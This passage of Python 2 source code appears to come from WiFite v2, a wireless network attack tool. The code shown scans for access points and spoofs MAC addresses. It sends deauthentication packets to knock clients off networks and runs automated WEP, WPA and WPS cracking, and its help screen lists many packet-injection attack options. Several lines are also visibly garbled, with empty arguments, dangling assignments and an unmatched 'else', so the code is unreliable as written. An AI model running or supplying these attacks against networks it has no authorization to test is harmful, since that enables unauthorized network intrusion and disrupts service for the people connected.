- be anonymized if they're already in monitor mode.
- Uses airmon-ng to put a device into Monitor Mode.
- Then uses the get_iface() method to retrieve the new interface's name.
- Sets global variable IFACE_TO_TAKE_DOWN as well.
- Returns the name of the interface in monitor mode.
- """
- mac_anonymize(iface)
- print GR+' [+]'+W+' enabling monitor mode on %s...' % (G+iface+W),
- stdout.flush()
- call(['airmon-ng', 'start', iface], stdout=DN, stderr=DN)
- print 'done'
- self.RUN_CONFIG.WIRELESS_IFACE = '' # remove this reference as we've started its monitoring counterpart
- self.RUN_CONFIG.IFACE_TO_TAKE_DOWN = self.get_iface()
- if self.RUN_CONFIG.TX_POWER > 0:
- print GR+' [+]'+W+' setting Tx power to %s%s%s...' % (G, self.RUN_CONFIG.TX_POWER, W),
- call(['iw', 'reg', 'set', 'BO'], stdout=OUTLOG, stderr=ERRLOG)
- call(['iwconfig', iface, 'txpower', self.RUN_CONFIG.TX_POWER], stdout=OUTLOG, stderr=ERRLOG)
- print 'done'
- def disable_monitor_mode(self):
- """
- The program may have enabled monitor mode on a wireless interface.
- We want to disable this before we exit, so we will do that.
- """
- if self.RUN_CONFIG.IFACE_TO_TAKE_DOWN == '': return
- print GR+' [+]'+W+' disabling monitor mode on %s...' % (G+self.RUN_CONFIG.IFACE_TO_TAKE_DOWN+W),
- stdout.flush()
- call(['airmon-ng', 'stop', self.RUN_CONFIG.IFACE_TO_TAKE_DOWN], stdout=DN, stderr=DN)
- print 'done'
- def rtl8187_fix(self, iface):
- """
- Attempts to solve "Unknown error 132" common with RTL8187 devices.
- Puts down interface, unloads/reloads driver module, then puts iface back up.
- Returns True if fix was attempted, False otherwise.
- """
- # Check if current interface is using the RTL8187 chipset
- proc_airmon = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
- proc_airmon.wait()
- using_rtl8187 = False
- for line in proc_airmon.communicate()[0].split():
- line = line.upper()
- if line.strip() == '' or line.startswith('INTERFACE'): continue
- if line.find(iface.upper()) and line.find('RTL8187') != -1: using_rtl8187 = True
- if not using_rtl8187:
- # Display error message and exit
- print R+' [!]'+O+' unable to generate airodump-ng CSV file'+W
- print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
- self.RUN_CONFIG.exit_gracefully(1)
- print O+" [!]"+W+" attempting "+O+"RTL8187 'Unknown Error 132'"+W+" fix..."
- original_iface = iface
- # Take device out of monitor mode
- airmon = Popen(['airmon-ng', 'stop', iface], stdout=PIPE, stderr=DN)
- airmon.wait()
- for line in airmon.communicate()[0].split('\n'):
- if line.strip() == '' or \
- line.startswith("Interface") or \
- line.find('(removed)') != -1:
- continue
- original_iface = line.split()[0] # line[:line.find('\t')]
- # Remove drive modules, block/unblock ifaces, probe new modules.
- print_and_exec(['ifconfig', original_iface, 'down'])
- print_and_exec(['rmmod', 'rtl8187'])
- print_and_exec(['rfkill', 'block', 'all'])
- print_and_exec(['rfkill', 'unblock', 'all'])
- print_and_exec(['modprobe', 'rtl8187'])
- print_and_exec(['ifconfig', original_iface, 'up'])
- print_and_exec(['airmon-ng', 'start', original_iface])
- print '\r \r',
- print O+' [!] '+W+'restarting scan...\n'
- return True
- def get_iface(self):
- """
- Get the wireless interface in monitor mode.
- Defaults to only device in monitor mode if found.
- Otherwise, enumerates list of possible wifi devices
- and asks user to select one to put into monitor mode (if multiple).
- Uses airmon-ng to put device in monitor mode if needed.
- Returns the name (string) of the interface chosen in monitor mode.
- """
- print GR+' [+]'+W+' scanning for wireless devices...'
- proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
- iface = ''
- monitors = []
- adapters = []
- for line in proc.communicate()[0].split('\n'):
- if len(line) == 0: continue
- if ord(line[0]) != 32: # Doesn't start with space
- iface = line[:line.find(' ')] # is the interface
- if line.find('Mode:Monitor') != -1:
- monitors.append(iface)
- else: adapters.append(iface)
- if monitors.count(self.RUN_CONFIG.WIRELESS_IFACE): return self.RUN_CONFIG.WIRELESS_IFACE
- else:
- if self.RUN_CONFIG.WIRELESS_IFACE in adapters:
- # valid adapter, enable monitor mode
- print R+' [!]'+O+' could not find wireless interface %s in monitor mode' % (R+'"'+R+self.RUN_CONFIG.WIRELESS_IFACE+'"'+O)
- return self.enable_monitor_mode(self.RUN_CONFIG.WIRELESS_IFACE)
- else:
- # couldnt find the requested adapter
- print R+' [!]'+O+' could not find wireless interface %s' % ('"'+R+self.RUN_CONFIG.WIRELESS_IFACE+O+'"'+W)
- self.RUN_CONFIG.exit_gracefully(0)
- if len(monitors) == 1:
- return monitors[0] # Default to only device in monitor mode
- elif len(monitors) > 1:
- print GR+" [+]"+W+" interfaces in "+G+"monitor mode:"+W
- for i, monitor in enumerate(monitors):
- print " %s. %s" % (G+str(i+1)+W, G+monitor+W)
- ri = raw_input("%s [+]%s select %snumber%s of interface to use for capturing (%s1-%d%s): %s" % \
- (GR, W, G, W, G, len(monitors), W, G))
- while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
- ri = raw_input("%s [+]%s select number of interface to use for capturing (%s1-%d%s): %s" % \
- (GR, W, G, len(monitors), W, G))
- i = int(ri)
- return monitors[i - 1]
- proc = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
- for line in proc.communicate()[0].split('\n'):
- if len(line) == 0 or line.startswith('Interface'): continue
- monitors.append(line)
- if len(monitors) == 0:
- print R+' [!]'+O+" no wireless interfaces were found."+W
- print R+' [!]'+O+" you need to plug in a wifi device or install drivers.\n"+W
- self.RUN_CONFIG.exit_gracefully(0)
- elif self.RUN_CONFIG.WIRELESS_IFACE != '' and monitors.count(self.RUN_CONFIG.WIRELESS_IFACE) > 0:
- return self.enable_monitor_mode(monitor)
- elif len(monitors) == 1:
- monitor = monitors[0][:monitors[0].find('\t')]
- return self.enable_monitor_mode(monitor)
- print GR+" [+]"+W+" available wireless devices:"
- for i, monitor in enumerate(monitors):
- print " %s%d%s. %s" % (G, i + 1, W, monitor)
- ri = raw_input(GR+" [+]"+W+" select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
- while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
- ri = raw_input(" [+] select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
- i = int(ri)
- monitor = monitors[i-1][:monitors[i-1].find('\t')]
- return self.enable_monitor_mode(monitor)
- def scan(self, channel=0, iface='', tried_rtl8187_fix=False):
- """
- Scans for access points. Asks user to select target(s).
- "channel" - the channel to scan on, 0 scans all channels.
- "iface" - the interface to scan on. must be a real interface.
- "tried_rtl8187_fix" - We have already attempted to fix "Unknown error 132"
- Returns list of selected targets and list of clients.
- """
- remove_airodump_files(self.RUN_CONFIG.temp + 'wifite')
- command = ['airodump-ng',
- '-a', # only show associated clients
- '-w', self.RUN_CONFIG.temp + 'wifite'] # output file
- if channel != 0:
- command.append('-c')
- command.append(str(channel))
- command.append(iface)
- proc = Popen(command, stdout=DN, stderr=DN)
- time_started = time.time()
- print GR+' [+] '+G+'initializing scan'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.'
- (targets, clients) = ([], [])
- try:
- deauth_sent = 0.0
- old_targets = []
- stop_scanning = False
- while True:
- time.sleep(0.3)
- if not os.path.exists(self.RUN_CONFIG.temp + 'wifite-01.csv') and time.time() - time_started > 1.0:
- print R+'\n [!] ERROR!'+W
- # RTL8187 Unknown Error 132 FIX
- if proc.poll() != None: # Check if process has finished
- proc = Popen(['airodump-ng', iface], stdout=DN, stderr=PIPE)
- if not tried_rtl8187_fix and proc.communicate()[1].find('failed: Unknown error 132') != -1:
- send_interrupt(proc)
- if self.rtl8187_fix(iface):
- return self.scan(channel=channel, iface=iface, tried_rtl8187_fix=True)
- print R+' [!]'+O+' wifite is unable to generate airodump-ng output files'+W
- print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
- self.RUN_CONFIG.exit_gracefully(1)
- (targets, clients) = self.parse_csv(self.RUN_CONFIG.temp + 'wifite-01.csv')
- # Remove any already cracked networks if configured to do so
- index = 0
- while index < len(targets):
- already = False
- for cracked in self.RUN_CONFIG.CRACKED_TARGETS:
- if targets[index].ssid.lower() == cracked.ssid.lower():
- already = True
- if targets[index].bssid.lower() == cracked.bssid.lower():
- already = True
- if already == True:
- targets.pop(index)
- index -= 1
- index += 1
- # If we are targeting a specific ESSID/BSSID, skip the scan once we find it.
- if self.RUN_CONFIG.TARGET_ESSID != '':
- for t in targets:
- if t.ssid.lower() == self.RUN_CONFIG.TARGET_ESSID.lower():
- send_interrupt(proc)
- try: os.kill(, SIGTERM)
- except OSError: pass
- except UnboundLocalError: pass
- targets = [t]
- stop_scanning = True
- break
- if self.RUN_CONFIG.TARGET_BSSID != '':
- for t in targets:
- if t.bssid.lower() == self.RUN_CONFIG.TARGET_BSSID.lower():
- send_interrupt(proc)
- try: os.kill(, SIGTERM)
- except OSError: pass
- except UnboundLocalError: pass
- targets = [t]
- stop_scanning = True
- break
- # If user has chosen to target all access points, wait 20 seconds, then return all
- if self.RUN_CONFIG.ATTACK_ALL_TARGETS and time.time() - time_started > 10:
- print GR+'\n [+]'+W+' auto-targeted %s%d%s access point%s' % (G, len(targets), W, '' if len(targets) == 1 else 's')
- stop_scanning = True
- if self.RUN_CONFIG.ATTACK_MIN_POWER > 0 and time.time() - time_started > 10:
- # Remove targets with power < threshold
- i = 0
- before_count = len(targets)
- while i < len(targets):
- if targets[i].power < self.RUN_CONFIG.ATTACK_MIN_POWER:
- targets.pop(i)
- else: i += 1
- print GR+'\n [+]'+W+' removed %s targets with power < %ddB, %s remain' % \
- (G+str(before_count - len(targets))+W, self.RUN_CONFIG.ATTACK_MIN_POWER, G+str(len(targets))+W)
- stop_scanning = True
- if stop_scanning: break
- # If there are unknown SSIDs, send deauths to them.
- if channel != 0 and time.time() - deauth_sent > 5:
- deauth_sent = time.time()
- for t in targets:
- if t.ssid == '':
- print "\r %s deauthing hidden access point (%s) \r" % \
- (GR+sec_to_hms(time.time() - time_started)+W, G+t.bssid+W),
- stdout.flush()
- # Time to deauth
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '--deauth', str(self.RUN_CONFIG.WPA_DEAUTH_COUNT),
- '-a', t.bssid]
- for c in clients:
- if c.station == t.bssid:
- cmd.append('-c')
- cmd.append(c.bssid)
- break
- cmd.append(iface)
- proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
- proc_aireplay.wait()
- time.sleep(0.5)
- else:
- for ot in old_targets:
- if ot.ssid == '' and ot.bssid == t.bssid:
- print '\r %s successfully decloaked "%s" ' % \
- (GR+sec_to_hms(time.time() - time_started)+W, G+t.ssid+W)
- old_targets = targets[:]
- if self.RUN_CONFIG.VERBOSE_APS and len(targets) > 0:
- targets = sorted(targets, key=lambda t: t.power, reverse=True)
- wps_check_targets(targets, self.RUN_CONFIG.temp + 'wifite-01.cap', verbose=False)
- os.system('clear')
- print GR+'\n [+] '+G+'scanning'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.\n'
- print ' --- -------------------- %s-- ---- ----- ---- ------' % ('----------------- ' if self.RUN_CONFIG.SHOW_MAC_IN_SCAN else '')
- for i, target in enumerate(targets):
- print " %s%2d%s " % (G, i + 1, W),
- # SSID
- if target.ssid == '':
- p = O+'('+target.bssid+')'+GR+' '+W
- print '%s' % p.ljust(20),
- elif ( target.ssid.count('\x00') == len(target.ssid) ):
- p = '<Length '+str(len(target.ssid))+'>'
- print '%s' % C+p.ljust(20)+W,
- elif len(target.ssid) <= 20:
- print "%s" % C+target.ssid.ljust(20)+W,
- else:
- print "%s" % C+target.ssid[0:17] + '...'+W,
- print O,target.bssid+W,
- # Channel
- print,W,
- # Encryption
- if target.encryption.find("WEP") != -1: print G,
- else: print O,
- print "\b%3s" % target.encryption.strip().ljust(4) + W,
- # Power
- if target.power >= 55: col = G
- elif target.power >= 40: col = O
- else: col = R
- print "%s%3ddb%s" % (col,target.power, W),
- # WPS
- print " %3s" % (O+'n/a'+W),
- else:
- print " %3s" % (G+'wps'+W if target.wps else R+' no'+W),
- # Clients
- client_text = ''
- for c in clients:
- if c.station == target.bssid:
- if client_text == '': client_text = 'client'
- elif client_text[-1] != "s": client_text += "s"
- if client_text != '': print ' %s' % (G+client_text+W)
- else: print ''
- print ''
- print ' %s %s wireless networks. %s target%s and %s client%s found \r' % (
- GR+sec_to_hms(time.time() - time_started)+W, G+'scanning'+W,
- G+str(len(targets))+W, '' if len(targets) == 1 else 's',
- G+str(len(clients))+W, '' if len(clients) == 1 else 's'),
- stdout.flush()
- except KeyboardInterrupt:
- pass
- print ''
- send_interrupt(proc)
- try: os.kill(, SIGTERM)
- except OSError: pass
- except UnboundLocalError: pass
- # Use "wash" program to check for WPS compatibility
- wps_check_targets(targets, self.RUN_CONFIG.temp + 'wifite-01.cap')
- remove_airodump_files(self.RUN_CONFIG.temp + 'wifite')
- if stop_scanning: return (targets, clients)
- print ''
- if len(targets) == 0:
- print R+' [!]'+O+' no targets found!'+W
- print R+' [!]'+O+' you may need to wait for targets to show up.'+W
- print ''
- self.RUN_CONFIG.exit_gracefully(1)
- if self.RUN_CONFIG.VERBOSE_APS: os.system('clear')
- # Sort by Power
- targets = sorted(targets, key=lambda t: t.power, reverse=True)
- victims = []
- print ' --- -------------------- %s-- ---- ----- ---- ------' % ('----------------- ' if self.RUN_CONFIG.SHOW_MAC_IN_SCAN else '')
- for i, target in enumerate(targets):
- print " %s%2d%s " % (G, i + 1, W),
- # SSID
- if target.ssid == '':
- p = O+'('+target.bssid+')'+GR+' '+W
- print '%s' % p.ljust(20),
- elif ( target.ssid.count('\x00') == len(target.ssid) ):
- p = '<Length '+str(len(target.ssid))+'>'
- print '%s' % C+p.ljust(20)+W,
- elif len(target.ssid) <= 20:
- print "%s" % C+target.ssid.ljust(20)+W,
- else:
- print "%s" % C+target.ssid[0:17] + '...'+W,
- print O,target.bssid+W,
- # Channel
- print,W,
- # Encryption
- if target.encryption.find("WEP") != -1: print G,
- else: print O,
- print "\b%3s" % target.encryption.strip().ljust(4) + W,
- # Power
- if target.power >= 55: col = G
- elif target.power >= 40: col = O
- else: col = R
- print "%s%3ddb%s" % (col,target.power, W),
- # WPS
- print " %3s" % (O+'n/a'+W),
- else:
- print " %3s" % (G+'wps'+W if target.wps else R+' no'+W),
- # Clients
- client_text = ''
- for c in clients:
- if c.station == target.bssid:
- if client_text == '': client_text = 'client'
- elif client_text[-1] != "s": client_text += "s"
- if client_text != '': print ' %s' % (G+client_text+W)
- else: print ''
- ri = raw_input(GR+"\n [+]"+W+" select "+G+"target numbers"+W+" ("+G+"1-%s)" % (str(len(targets))+W) + \
- " separated by commas, or '%s': " % (G+'all'+W))
- if ri.strip().lower() == 'all':
- victims = targets[:]
- else:
- for r in ri.split(','):
- r = r.strip()
- if r.find('-') != -1:
- (sx, sy) = r.split('-')
- if sx.isdigit() and sy.isdigit():
- x = int(sx)
- y = int(sy) + 1
- for v in xrange(x, y):
- victims.append(targets[v - 1])
- elif not r.isdigit() and r.strip() != '':
- print O+" [!]"+R+" not a number: %s " % (O+r+W)
- elif r != '':
- victims.append(targets[int(r) - 1])
- if len(victims) == 0:
- print O+'\n [!] '+R+'no targets selected.\n'+W
- self.RUN_CONFIG.exit_gracefully(0)
- print ''
- print ' [+] %s%d%s target%s selected.' % (G, len(victims), W, '' if len(victims) == 1 else 's')
- return (victims, clients)
- def Start(self):
- self.RUN_CONFIG.CreateTempFolder()
- self.RUN_CONFIG.handle_args()
- self.RUN_CONFIG.ConfirmRunningAsRoot()
- self.RUN_CONFIG.ConfirmCorrectPlatform()
- self.initial_check() # Ensure required programs are installed.
- # The "get_iface" method anonymizes the MAC address (if needed)
- # and puts the interface into monitor mode.
- iface = self.get_iface()
- self.RUN_CONFIG.THIS_MAC = get_mac_address(iface) # Store current MAC address
- (targets, clients) = self.scan(iface=iface, channel=self.RUN_CONFIG.TARGET_CHANNEL)
- try:
- index = 0
- while index < len(targets):
- target = targets[index]
- # Check if we have already cracked this target
- if already.bssid == targets[index].bssid:
- print R+'\n [!]'+O+' you have already cracked this access point\'s key!'+W
- print R+' [!] %s' % (C+already.ssid+W+': "'+G+already.key+W+'"')
- ri = raw_input(GR+' [+] '+W+'do you want to crack this access point again? ('+G+'y/'+O+'n'+W+'): ')
- if ri.lower() == 'n':
- targets.pop(index)
- index -= 1
- else:
- targets.pop(index)
- index -= 1
- break
- # Check if handshakes already exist, ask user whether to skip targets or save new handshakes
- handshake_file = RUN_CONFIG.WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
- + '_' + target.bssid.replace(':', '-') + '.cap'
- if os.path.exists(handshake_file):
- print R+'\n [!] '+O+'you already have a handshake file for %s:' % (C+target.ssid+W)
- print ' %s\n' % (G+handshake_file+W)
- print GR+' [+]'+W+' do you want to '+G+'[s]kip'+W+', '+O+'[c]apture again'+W+', or '+R+'[o]verwrite'+W+'?'
- ri = 'x'
- while ri != 's' and ri != 'c' and ri != 'o':
- ri = raw_input(GR+' [+] '+W+'enter '+G+'s'+W+', '+O+'c,'+W+' or '+R+'o'+W+': '+G).lower()
- print W+"\b",
- if ri == 's':
- targets.pop(index)
- index -= 1
- elif ri == 'o':
- remove_file(handshake_file)
- continue
- index += 1
- except KeyboardInterrupt:
- print '\n '+R+'(^C)'+O+' interrupted\n'
- self.RUN_CONFIG.exit_gracefully(0)
- wpa_success = 0
- wep_success = 0
- wpa_total = 0
- wep_total = 0
- self.RUN_CONFIG.TARGETS_REMAINING = len(targets)
- for t in targets:
- # Build list of clients connected to target
- ts_clients = []
- for c in clients:
- if c.station == t.bssid:
- ts_clients.append(c)
- print ''
- if t.encryption.find('WPA') != -1:
- need_handshake = True
- if not self.RUN_CONFIG.WPS_DISABLE and t.wps:
- wps_attack = WPSAttack(iface, t, self.RUN_CONFIG)
- need_handshake = not wps_attack.RunAttack()
- wpa_total += 1
- if not need_handshake: wpa_success += 1
- if not self.RUN_CONFIG.WPA_DISABLE and need_handshake:
- wpa_total += 1
- wpa_attack = WPAAttack(iface, t, ts_clients, self.RUN_CONFIG)
- if wpa_attack.RunAttack():
- wpa_success += 1
- elif t.encryption.find('WEP') != -1:
- wep_total += 1
- wep_attack = WEPAttack(iface, t, ts_clients, self.RUN_CONFIG)
- if wep_attack.RunAttack():
- wep_success += 1
- else: print R+' unknown encryption:',t.encryption,W
- # If user wants to stop attacking
- if self.RUN_CONFIG.TARGETS_REMAINING <= 0: break
- if wpa_total + wep_total > 0:
- # Attacks are done! Show results to user
- print ''
- print GR+' [+] %s%d attack%s completed:%s' % (G, wpa_total + wep_total, '' if wpa_total+wep_total == 1 else 's', W)
- print ''
- if wpa_total > 0:
- if wpa_success == 0: print GR+' [+]'+R,
- elif wpa_success == wpa_total: print GR+' [+]'+G,
- else: print GR+' [+]'+O,
- print '%d/%d%s WPA attacks succeeded' % (wpa_success, wpa_total, W)
- for finding in self.RUN_CONFIG.WPA_FINDINGS:
- print ' ' + C+finding+W
- if wep_total > 0:
- if wep_success == 0: print GR+' [+]'+R,
- elif wep_success == wep_total: print GR+' [+]'+G,
- else: print GR+' [+]'+O,
- print '%d/%d%s WEP attacks succeeded' % (wep_success, wep_total, W)
- for finding in self.RUN_CONFIG.WEP_FINDINGS:
- print ' ' + C+finding+W
- caps = len(self.RUN_CONFIG.WPA_CAPS_TO_CRACK)
- if caps > 0 and not self.RUN_CONFIG.WPA_DONT_CRACK:
- print GR+' [+]'+W+' starting '+G+'WPA cracker'+W+' on %s%d handshake%s' % (G, caps, W if caps == 1 else 's'+W)
- for cap in self.RUN_CONFIG.WPA_CAPS_TO_CRACK:
- wpa_crack(cap)
- print ''
- self.RUN_CONFIG.exit_gracefully(0)
- def parse_csv(self, filename):
- """
- Parses given lines from airodump-ng CSV file.
- Returns tuple: List of targets and list of clients.
- """
- if not os.path.exists(filename): return ([], [])
- targets = []
- clients = []
- try:
- hit_clients = False
- with open(filename, 'rb') as csvfile:
- targetreader = csv.reader((line.replace('\0','') for line in csvfile), delimiter=',')
- for row in targetreader:
- if len(row) < 2:
- continue
- if not hit_clients:
- if len(row) < 14:
- continue
- if row[0].strip() == 'Station MAC':
- hit_clients = True
- if row[0].strip() == 'BSSID' or row[0].strip() == 'Station Mac': continue
- enc = row[5].strip()
- wps = False
- if enc.find('WPA') == -1 and enc.find('WEP') == -1: continue
- if self.RUN_CONFIG.WEP_DISABLE and enc.find('WEP') != -1: continue
- if self.RUN_CONFIG.WPA_DISABLE and self.RUN_CONFIG.WPS_DISABLE and enc.find('WPA') != -1: continue
- if enc == "WPA2WPA":
- enc = "WPA2"
- wps = True
- power = int(row[8].strip())
- ssid = row[13].strip()
- ssidlen = int(row[12].strip())
- ssid = ssid[:ssidlen]
- if power < 0: power += 100
- t = Target(row[0].strip(), power, row[10].strip(), row[3].strip(), enc, ssid)
- t.wps = wps
- targets.append(t)
- else:
- if len(row) < 6:
- continue
- bssid = re.sub(r'[^a-zA-Z0-9:]', '', row[0].strip())
- station = re.sub(r'[^a-zA-Z0-9:]', '', row[5].strip())
- power = row[3].strip()
- if station != 'notassociated':
- c = Client(bssid, station, power)
- clients.append(c)
- except IOError as e:
- print "I/O error({0}): {1}".format(e.errno, e.strerror)
- return ([], [])
- return (targets, clients)
- def analyze_capfile(self, capfile):
- """
- Analyzes given capfile for handshakes using various programs.
- Prints results to console.
- """
- # we're not running an attack
- wpa_attack = WPAAttack(None, None, None)
- print R+' [!]'+O+' target ssid and bssid are required to check for handshakes'
- print R+' [!]'+O+' please enter essid (access point name) using -e <name>'
- print R+' [!]'+O+' and/or target bssid (mac address) using -b <mac>\n'
- # exit_gracefully(1)
- if self.UN_CONFIG.TARGET_BSSID == '':
- # Get the first BSSID found in tshark!
- self.RUN_CONFIG.TARGET_BSSID = get_bssid_from_cap(self.RUN_CONFIG.TARGET_ESSID, capfile)
- # if TARGET_BSSID.find('->') != -1: TARGET_BSSID == ''
- if self.RUN_CONFIG.TARGET_BSSID == '':
- print R+' [!]'+O+' unable to guess BSSID from ESSID!'
- else:
- print GR+' [+]'+W+' guessed bssid: %s' % (G+self.RUN_CONFIG.TARGET_BSSID+W)
- self.RUN_CONFIG.TARGET_ESSID = get_essid_from_cap(self.RUN_CONFIG.TARGET_BSSID, capfile)
- print GR+'\n [+]'+W+' checking for handshakes in %s' % (G+capfile+W)
- t = Target(self.RUN_CONFIG.TARGET_BSSID, '', '', '', 'WPA', self.RUN_CONFIG.TARGET_ESSID)
- if program_exists('pyrit'):
- result = wpa_attack.has_handshake_pyrit(t, capfile)
- print GR+' [+]'+W+' '+G+'pyrit'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
- else: print R+' [!]'+O+' program not found: pyrit'
- if program_exists('cowpatty'):
- result = wpa_attack.has_handshake_cowpatty(t, capfile, nonstrict=True)
- print GR+' [+]'+W+' '+G+'cowpatty'+W+' (nonstrict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
- result = wpa_attack.has_handshake_cowpatty(t, capfile, nonstrict=False)
- print GR+' [+]'+W+' '+G+'cowpatty'+W+' (strict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
- else: print R+' [!]'+O+' program not found: cowpatty'
- if program_exists('tshark'):
- result = wpa_attack.has_handshake_tshark(t, capfile)
- print GR+' [+]'+W+' '+G+'tshark'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
- else: print R+' [!]'+O+' program not found: tshark'
- if program_exists('aircrack-ng'):
- result = wpa_attack.has_handshake_aircrack(t, capfile)
- print GR+' [+]'+W+' '+G+'aircrack-ng'+W+':\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
- else: print R+' [!]'+O+' program not found: aircrack-ng'
- print ''
- self.RUN_CONFIG.exit_gracefully(0)
- ##################
- ##################
- ##############################################################
- ### End Classes
- def rename(old, new):
- """
- Renames file 'old' to 'new', works with separate partitions.
- Thanks to hannan.sadar
- """
- try:
- os.rename(old, new)
- except os.error, detail:
- if detail.errno == errno.EXDEV:
- try:
- copy(old, new)
- except:
- os.unlink(new)
- raise
- os.unlink(old)
- # if desired, deal with other errors
- else:
- raise
- def banner(RUN_CONFIG):
- """
- Displays ASCII art of the highest caliber.
- """
- print ''
- print G+" .;' `;, "
- print G+" .;' ,;' `;, `;, "+W+"WiFite v2 (r" + str(RUN_CONFIG.REVISION) + ")"
- print G+".;' ,;' ,;' `;, `;, `;, "
- print G+":: :: : "+GR+"( )"+G+" : :: :: "+GR+"automated wireless auditor"
- print G+"':. ':. ':. "+GR+"/_\\"+G+" ,:' ,:' ,:' "
- print G+" ':. ':. "+GR+"/___\\"+G+" ,:' ,:' "+GR+"designed for Linux"
- print G+" ':. "+GR+"/_____\\"+G+" ,:' "
- print G+" "+GR+"/ \\"+G+" "
- print W
- def get_revision():
- """
- Gets latest revision # from the GitHub repository
- Returns : revision#
- """
- irev =-1
- try:
- sock = urllib.urlopen('')
- page =
- except IOError:
- return (-1, '', '')
- # get the revision
- start= page.find('REVISION = ')
- stop = page.find(";", start)
- if start != -1 and stop != -1:
- start += 11
- rev=page[start:stop]
- try:
- irev=int(rev)
- except ValueError:
- rev=rev.split('\n')[0]
- print R+'[+] invalid revision number: "'+rev+'"'
- return irev
- def help():
- """
- Prints help screen
- """
- head = W
- sw = G
- var = GR
- des = W
- de = G
- print head+' COMMANDS'+W
- print sw+'\t-check '+var+'<file>\t'+des+'check capfile '+var+'<file>'+des+' for handshakes.'+W
- print sw+'\t-cracked \t'+des+'display previously-cracked access points'+W
- print sw+'\t-recrack \t'+des+'allow recracking of previously cracked access points'+W
- print ''
- print head+' GLOBAL'+W
- print sw+'\t-all \t'+des+'attack all targets. '+de+'[off]'+W
- #print sw+'\t-pillage \t'+des+'attack all targets in a looping fashion.'+de+'[off]'+W
- print sw+'\t-i '+var+'<iface> \t'+des+'wireless interface for capturing '+de+'[auto]'+W
- print sw+'\t-mac \t'+des+'anonymize mac address '+de+'[off]'+W
- print sw+'\t-c '+var+'<channel>\t'+des+'channel to scan for targets '+de+'[auto]'+W
- print sw+'\t-e '+var+'<essid> \t'+des+'target a specific access point by ssid (name) '+de+'[ask]'+W
- print sw+'\t-b '+var+'<bssid> \t'+des+'target a specific access point by bssid (mac) '+de+'[auto]'+W
- print sw+'\t-showb \t'+des+'display target BSSIDs after scan '+de+'[off]'+W
- print sw+'\t-pow '+var+'<db> \t'+des+'attacks any targets with signal strenghth > '+var+'db '+de+'[0]'+W
- print sw+'\t-quiet \t'+des+'do not print list of APs during scan '+de+'[off]'+W
- print ''
- print head+'\n WPA'+W
- print sw+'\t-wpa \t'+des+'only target WPA networks (works with -wps -wep) '+de+'[off]'+W
- print sw+'\t-wpat '+var+'<sec> \t'+des+'time to wait for WPA attack to complete (seconds) '+de+'[500]'+W
- print sw+'\t-wpadt '+var+'<sec> \t'+des+'time to wait between sending deauth packets (sec) '+de+'[10]'+W
- print sw+'\t-strip \t'+des+'strip handshake using tshark or pyrit '+de+'[off]'+W
- print sw+'\t-crack '+var+'<dic>\t'+des+'crack WPA handshakes using '+var+'<dic>'+des+' wordlist file '+de+'[off]'+W
- print sw+'\t-dict '+var+'<file>\t'+des+'specify dictionary to use when cracking WPA '+de+'[phpbb.txt]'+W
- print sw+'\t-aircrack \t'+des+'verify handshake using aircrack '+de+'[on]'+W
- print sw+'\t-pyrit \t'+des+'verify handshake using pyrit '+de+'[off]'+W
- print sw+'\t-tshark \t'+des+'verify handshake using tshark '+de+'[on]'+W
- print sw+'\t-cowpatty \t'+des+'verify handshake using cowpatty '+de+'[off]'+W
- print head+'\n WEP'+W
- print sw+'\t-wep \t'+des+'only target WEP networks '+de+'[off]'+W
- print sw+'\t-pps '+var+'<num> \t'+des+'set the number of packets per second to inject '+de+'[600]'+W
- print sw+'\t-wept '+var+'<sec> \t'+des+'sec to wait for each attack, 0 implies endless '+de+'[600]'+W
- print sw+'\t-chopchop \t'+des+'use chopchop attack '+de+'[on]'+W
- print sw+'\t-arpreplay \t'+des+'use arpreplay attack '+de+'[on]'+W
- print sw+'\t-fragment \t'+des+'use fragmentation attack '+de+'[on]'+W
- print sw+'\t-caffelatte \t'+des+'use caffe-latte attack '+de+'[on]'+W
- print sw+'\t-p0841 \t'+des+'use -p0841 attack '+de+'[on]'+W
- print sw+'\t-hirte \t'+des+'use hirte (cfrag) attack '+de+'[on]'+W
- print sw+'\t-nofakeauth \t'+des+'stop attack if fake authentication fails '+de+'[off]'+W
- print sw+'\t-wepca '+GR+'<n> \t'+des+'start cracking when number of ivs surpass n '+de+'[10000]'+W
- print sw+'\t-wepsave \t'+des+'save a copy of .cap files to this directory '+de+'[off]'+W
- print head+'\n WPS'+W
- print sw+'\t-wps \t'+des+'only target WPS networks '+de+'[off]'+W
- print sw+'\t-wpst '+var+'<sec> \t'+des+'max wait for new retry before giving up (0: never) '+de+'[660]'+W
- print sw+'\t-wpsratio '+var+'<per>\t'+des+'min ratio of successful PIN attempts/total tries '+de+'[0]'+W
- print sw+'\t-wpsretry '+var+'<num>\t'+des+'max number of retries for same PIN before giving up '+de+'[0]'+W
- print head+'\n EXAMPLE'+W
- print sw+'\t./ '+W+'-wps -wep -c 6 -pps 600'+W
- print ''
- ###########################
- ###########################
- ######################
- ######################
- def wps_check_targets(targets, cap_file, verbose=True):
- """
- Uses reaver's "walsh" (or wash) program to check access points in cap_file
- for WPS functionality. Sets "wps" field of targets that match to True.
- """
- global RUN_CONFIG
- if not program_exists('walsh') and not program_exists('wash'):
- RUN_CONFIG.WPS_DISABLE = True # Tell 'scan' we were unable to execute walsh
- return
- program_name = 'walsh' if program_exists('walsh') else 'wash'
